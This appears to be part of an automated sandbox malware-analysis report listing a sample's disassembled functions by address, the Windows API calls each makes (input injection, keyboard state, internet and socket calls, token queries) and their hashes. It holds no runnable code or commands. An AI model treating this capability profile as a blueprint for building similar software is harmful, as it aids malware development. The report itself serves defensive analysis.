Opcode ID: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
Instruction ID: 87e5a9bfdfff9c845bf647487e866e9cced1a94fbcbcc4f7d8d1e25b4db0f31c
Opcode Fuzzy Hash: 5dac36bbfbf88a7458cc0230f80005ee9af9aca2bc4d09f53f21e1134249c3f3
Instruction Fuzzy Hash: D6515E75A00214AFCF10DF68C8C0ABE77B5EB55324F10866AF89597291E734ED41CB99

Function 0043C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0043C462
__itow.LIBCMT ref: 0043C49C

Part of subcall function 0043C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0043C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0043C505
__itow.LIBCMT ref: 0043C55A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction ID: 800f785b87ce5464c2f688b8ea43766e1c02cbf4e719b26cad73e40aff914bb9
Opcode Fuzzy Hash: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction Fuzzy Hash: 4041B571A00218BBDF21DF55C892BEE7BB5AF58704F00102EF905B72C1DB789A458BA9

Function 0044390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00443966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00443982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004439EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00443A4D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
Instruction ID: 469bf99c801f96624eea77c586d463107e8b0cfafe3e1a68cffd4768a2f07c69
Opcode Fuzzy Hash: 2c939a98cf763ffb77da0aece4c4b47de92a8762862d89eb48351c3921102d85
Instruction Fuzzy Hash: A74119B0E442486AFF208F6588067FEBBB59B45712F04015BF4C1A22C1C7BC9E85D76D

Function 0044E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0044E742
GetLastError.KERNEL32(?,00000000), ref: 0044E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0044E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0044E7B9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
Instruction ID: a2bdcbcb23e6067ac7ad5f975947d6cfe77527ed2825ba135b237677522510d0
Opcode Fuzzy Hash: 88b17f692d8923e6e1f1b884cdf447b11d7de581a9de8c5022e799896a57d2ed
Instruction Fuzzy Hash: 1B413C35600610DFCF11EF26C54494DBBE5BF59724B09849AED46AB3A2CB78FC40CB99

Function 0046B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0046B5D1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
Instruction ID: c86e180ac39fdd8a69f0b1340c4036a34fcc01a06aab4df10420dcd6b6513ddd
Opcode Fuzzy Hash: 4468e08ec7a5a13a57baa00e831cc90bcc106295cf6b275835b4ddfad8e98b7a
Instruction Fuzzy Hash: 3531D034601208BBEB208A19CC84FEA3765EB06354F544517FA12D62F1F738A9C08BDF

Function 0046D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046D807
GetWindowRect.USER32(?,?), ref: 0046D87D
PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D
MessageBeep.USER32(00000000), ref: 0046D8FE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction ID: 5fa1f60125daaa5e84eea42d34aebc29e8453dd218e4da573cb7e242a531e712
Opcode Fuzzy Hash: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction Fuzzy Hash: EE418C70F00218DFCB11EF59C888F697BB5FB45314F1881AAE4249B261E334E945CB4A

Function 00443A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00443AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00443AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00443B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00443B92

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 263daed8e963b5f026b3b5a935e482da605860b1e8f3085a244120f057bc658a
Instruction ID: 2f98bc7394ad28ff649f17632b92abe90ebe01e556a85012e6bb176e73858dbf
Opcode Fuzzy Hash: 263daed8e963b5f026b3b5a935e482da605860b1e8f3085a244120f057bc658a
Instruction Fuzzy Hash: 12311230A00298AEFB218F648819BBEBBA5DB45716F04011BE481922D2C77CAA45D76A

Function 00434004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00434038
__isleadbyte_l.LIBCMT ref: 00434066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004340CA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction ID: 18c0360fd1569c977bfde1c2717b0e17dfe99921f0502833c073a699be0c4c70
Opcode Fuzzy Hash: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction Fuzzy Hash: 5531D230700216AFDB259F35C844BEB7BB5BF89320F15542AE661872E0E735E891DB98

Function 00467CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00467CB9

Part of subcall function 00445F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445F6F
Part of subcall function 00445F55: GetCurrentThreadId.KERNEL32 ref: 00445F76
Part of subcall function 00445F55: AttachThreadInput.USER32(00000000,?,0044781F), ref: 00445F7D

GetCaretPos.USER32(?), ref: 00467CCA
ClientToScreen.USER32(00000000,?), ref: 00467D03
GetForegroundWindow.USER32 ref: 00467D09

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 475eef5d6a0f7350404378f52132966eac9dc0902e039215e27cd1f42a9e50d2
Instruction ID: 4265c9a58fc21a01463dbc443cf0bcd3287e19691df341119bed6f6131297230
Opcode Fuzzy Hash: 475eef5d6a0f7350404378f52132966eac9dc0902e039215e27cd1f42a9e50d2
Instruction Fuzzy Hash: 01314171D00108AFDB00EFAACD819EFBBFDEF58314B10846BE815E3211E6349E458BA5

Function 0045431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00454358

Part of subcall function 004543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
Part of subcall function 004543E2: InternetCloseHandle.WININET(00000000), ref: 0045449E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction ID: f2f30b271a6af74a9d7b134cde8f3afa5d8ff7ebb5d92f8591c0153e2dca6813
Opcode Fuzzy Hash: 23476ad00b1c133f1f77fd0b13a0606d68f7732e4638b2d096305fe921693c16
Instruction Fuzzy Hash: C521D431701601BBEB119F60DC00F7BB7A9FF8471AF00402FBE159B6A1D7759869A798

Function 00458A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00458AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00458AFF
WSAGetLastError.WSOCK32(00000000), ref: 00458B16

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction ID: cec81d560cfc8959454608d08dcc177ad0e4f6f8aca8df67afe39ee5a7d451b4
Opcode Fuzzy Hash: 711e5e09de6b334ae93931dc8d7817e6883ab6da51fd9947bc8cc4e3ff753325
Instruction Fuzzy Hash: 9E21C372A011249FC7109F69C885A9EBBECEF49310F00416EF849E7291DB789A458F94

Function 00468A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00468AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00468ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00468ADC

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
Instruction ID: 3b2d1d0a209467fe1eaa344d409eb254f997c443b6415a419c9b2e187924ca12
Opcode Fuzzy Hash: ec46bcc3424c7f0b60b5022ca69ac279ce60391e6094a870371a726020423920
Instruction Fuzzy Hash: 3811E131606011AFDB04AB54CC05FBE7799AF85324F14422EFC16D72E2DBB8AC008799

Function 00440AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00441E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441E77
Part of subcall function 00441E68: lstrcpyW.KERNEL32(00000000,?,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00441E9D
Part of subcall function 00441E68: lstrcmpiW.KERNEL32(00000000,?,00440ABB,?,?,?,0044187A,00000000,000000EF,00000119,?,?), ref: 00441ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AD4
lstrcpyW.KERNEL32(00000000,?,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0044187A,00000000,000000EF,00000119,?,?,00000000), ref: 00440B2E

Strings

cdecl, xrefs: 00440B25

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e6c6f91e1f925b026ed40e71a82c0bfa30e809dbf06e465832c3f79b73ca7e33
Instruction ID: c7304db2e455f905d58f141a894c6769a3b5098f9c982885bc3ade38f0d3ce7e
Opcode Fuzzy Hash: e6c6f91e1f925b026ed40e71a82c0bfa30e809dbf06e465832c3f79b73ca7e33
Instruction Fuzzy Hash: 95110636200344AFEB209F64CC05D7A77A8FF45354B80412FE905CB2A0EB75E851C7A8

Function 00432F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00432FB5

Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d040e6fcad0b5df15d38d50de139313c77d1a29f61a7561f1b8406e9c5ed3d25
Instruction ID: 49a6a1f19b535ba8fc49ed021f10ce5f4a0a1db8662e9c22c6828818e7789cec
Opcode Fuzzy Hash: d040e6fcad0b5df15d38d50de139313c77d1a29f61a7561f1b8406e9c5ed3d25
Instruction Fuzzy Hash: E5113D31609221ABCB313F71BC0462A3BA4AF18369F60592FF809C6261CB7CC840979C

Function 0041EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041EBB2

Part of subcall function 004051AF: _memset.LIBCMT ref: 0040522F
Part of subcall function 004051AF: _wcscpy.LIBCMT ref: 00405283
Part of subcall function 004051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293

KillTimer.USER32(?,00000001,?,?), ref: 0041EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0041EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00473C88

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction ID: b49518ba9000ce9ca09009b9798321fdbb3bf5267274904d3eb6e3e3661bd638
Opcode Fuzzy Hash: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction Fuzzy Hash: 3521DD759057949FE7339B248C55FE7BFEC9B01308F04045ED68E66282D3781A858B5A

Function 0044058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004405AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004405C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004405DD
FreeLibrary.KERNEL32(?), ref: 00440632

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction ID: edd6db39d660dcb4e0c32f863c5204c469b601a469209fca3a932210d4679436
Opcode Fuzzy Hash: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
Instruction Fuzzy Hash: 5021B471900208EFEB20DF95DC89ADBBBB8EF40704F00846EE61792150D778EA65DF59

Function 00446713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00446733
_memset.LIBCMT ref: 00446754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004467A6
CloseHandle.KERNEL32(00000000), ref: 004467AF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction ID: 8b91472a63e09bb99e4025de3935e9e18f15fd5f322b2290e887984ed070b48b
Opcode Fuzzy Hash: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
Instruction Fuzzy Hash: E5110A71D022287AE73067A5AC4DFAFBBBCEF45764F1045AAF904E71D0D2744E808B69

Function 0043B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
Part of subcall function 0043AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
Part of subcall function 0043AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
Part of subcall function 0043AA62: RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

GetLengthSid.ADVAPI32(?,00000000,0043ADE4,?,?), ref: 0043B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0043B227
RtlAllocateHeap.KERNEL32(00000000), ref: 0043B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0043B247

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 259861997-0
